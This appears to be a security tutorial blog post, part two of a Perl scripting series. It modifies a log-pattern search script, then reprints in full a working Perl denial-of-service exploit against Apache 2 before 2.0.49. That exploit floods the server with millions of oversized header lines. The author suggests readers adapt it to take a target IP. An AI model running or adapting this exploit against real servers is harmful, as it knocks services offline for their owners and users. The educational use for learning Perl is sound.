Scripting and Security (Part 2)

If you missed the previous article in this series please read Scripting and Security (Part 1).

In the first part of this article series on how scripting can impact you as a practicing computer security professional, we looked at how a PERL script can do just that. Much as I mentioned in the first article there are many and varied uses for PERL, or Python depending on your preference. What we shall cover in this last article is how to modify further the script I included in the first part, and then look at the io:module that PERL has. Rounding out the article will be a quick look at some power tools such as sed, grep, and others that have been ported to Win32.

Modifying scripts

I don’t know about you guys, but it is not unusual to start a new job only to find out there are a lot of legacy scripts for you to maintain. What I mean by legacy scripts are ones that were there prior to your starting your new job. It is often difficult to maintain or understand these scripts depending on how well written they were, and the lack of, or abundance of, comments in the script itself. Remember, if your script is going to become a sizeable one you should include heavy commenting for those who may end up having to maintain, or modify your script. On that note let’s take a look at the script I had written in the first article.

For the sake of brevity I won’t include the script or the input file I showed you in part one of this article. Please go copy and paste that sample input file into your C:\ drive. Now that you have done that we are ready to modify the script seen in part one in a simple fashion. What we shall do is simply modify the search pattern of “192.168.1.102” by adding another IP address. Yes indeed you can have a script that searches for more then one pattern at a time! The only change that we will actually make is as noted below. Everything else about the script will remain the same.

#!/usr/bin/perl -w

$pattern = “(192.168.1.102|192.168.1.103)”; #changes are done here on this line

open(INPUT, ‘c:\articlefile’) || die “can’t open the file called article_file: $1”;

open(OUTPUT, ‘>c:\articleoutput’) ||die “can’t write to the file called script_output: $1”;

while(<INPUT>)  {
    if ($_ =~(m/$pattern/g))    {
        print OUTPUT “$_\n”;

    }
}

close(INPUT);
close(OUTPUT);

Now that we have modified our script as seen above the versatility of PERL once again comes to the fore. With a simple change to one line you would now be able to search for multiple instances of a pattern that would be of interest to you. Fast, easy, and quick, or you could also say the very reason that PERL is so popular.

PERL’s io:module

Earlier in the article I mentioned that we would look at one of the many modules that PERL has to offer. Hopefully you will have checked the hyperlink I just supplied you for there is a treasure trove of modules waiting for you there. It is a great place to find working modules, and then practice your PERL by trying to modify them for some other purpose. That or simply study what good PERL looks like. Seeing as security is always of concern to us let’s take a look at a small piece of exploit code that was written in PERL, and that also made use of the io:module in it. Please see below for the example code. Also please note the series of print statements for proper credit of this script goes to Georgi Guninski.

#!/usr/bin/perl
#
#exploit for apache ap_get_mime_headers_core() vuln
#
#adv is here: http://www.guninski.com/httpd1.html
#
#version: apache 2 <2.0.49 apache 1 not tested.
#
#by bkbll bkbll#cnhonker.net http://www.cnhonker.com
#
#tail -f /var/log/messages
#Jul 1 17:43:16 www kernel: Out of Memory: Killed process 658 (httpd)
#











use IO::Socket::INET;

$host=”192.168.1.108″;
$port=80;
$sock = IO::Socket::INET->new(PeerAddr => $host,PeerPort => $port, Proto
=> ‘tcp’) || die “new [email protected]\n”;
binmode($sock);
$hostname=”Host: $host”;
$buf2=’A’x50;
$buf4=’A’x8183;
$len=length($buf2);
$buf=”GET / HTTP/1.1\r\n”;
send($sock,$buf,0) || die “send error:[email protected]\n”;
for($i= 0; $i < 2000000; $i++)
{
    $buf=” $buf4\r\n”;
    send($sock,$buf,0) || die “send error:[email protected], target maybe have been
D.o.S?\n”;
}
$buf=”$hostname\r\n”;
$buf.=”Content-Length: $len\r\n”;
















$buf.=”\r\n”;
$buf.=$buf2.”\r\n\r\n”;

send($sock,$buf,0) || die “send error:[email protected]\n”;
print “Ok, our buffer have send to target \n”;
close($sock);

We can see from this script that it is using a hard coded IP address. This is seen on the line that I underlined ie: the scalar value $host. Over the course of a short 24 lines of PERL code is born some rather nifty exploit code. It was used to demonstrate a denial of service (DOS) condition in the Apache web server. When we see exploit code in C or C++ on the other hand there is normally a fair amount more lines then 24.

This piece of exploit code is a perfect example of how you could flex your budding PERL muscles. How about you go ahead and modify the script so that you prompt the user for the IP address vice having it hard coded as seen above? You could also do the same for the port scalar. These would simply be minor modifications but they would serve to show just how flexible, and compact PERL can be.

Power tools

For the longest time Linux and UNIX could lay claim that they had the best shell tools around. It was rather tough to dispute that claim to be honest, for they did. Well that has since changed and win32 now has access to the very same shell tools. Ported to win32 from Linux and UNIX are some of the best known tools like sed and grep. Having the ability to make changes to one specific term in a lengthy document can be cumbersome. Not so with the sed utility. That little program makes short work of such a task as it is a stream editor aka sed. You can download these tools right here. Once you become accustomed to using such tools as sed and grep it will give you a new appreciation for the command line interface afforded you via cmd.exe.

Wrap up

We have seen over the course of this two part article series that PERL is really rather invaluable for a computer security professional. If trying to learn C or C++ is really just not for you, then definitely invest a bit of time in trying to learn some survival PERL skills. Having the ability to write such simple PERL scripts as were covered here will save you loads of time in the future. Another excellent feature of PERL is its portability in case you work in a heterogeneous environment. Lastly, very useful tools such as sed and grep can also be helpful in your day to day activities. You would be surprised as just how powerful some of these tools can be once you have become comfortable with them. I sincerely hope you enjoyed this article series, and as always welcome your feedback. Till the next time!

If you missed the previous article in this series please read Scripting and Security (Part 1).

About The Author

Leave a Comment

Your email address will not be published. Required fields are marked *

This site is protected by reCAPTCHA and the Google Privacy Policy and Terms of Service apply.

Scroll to Top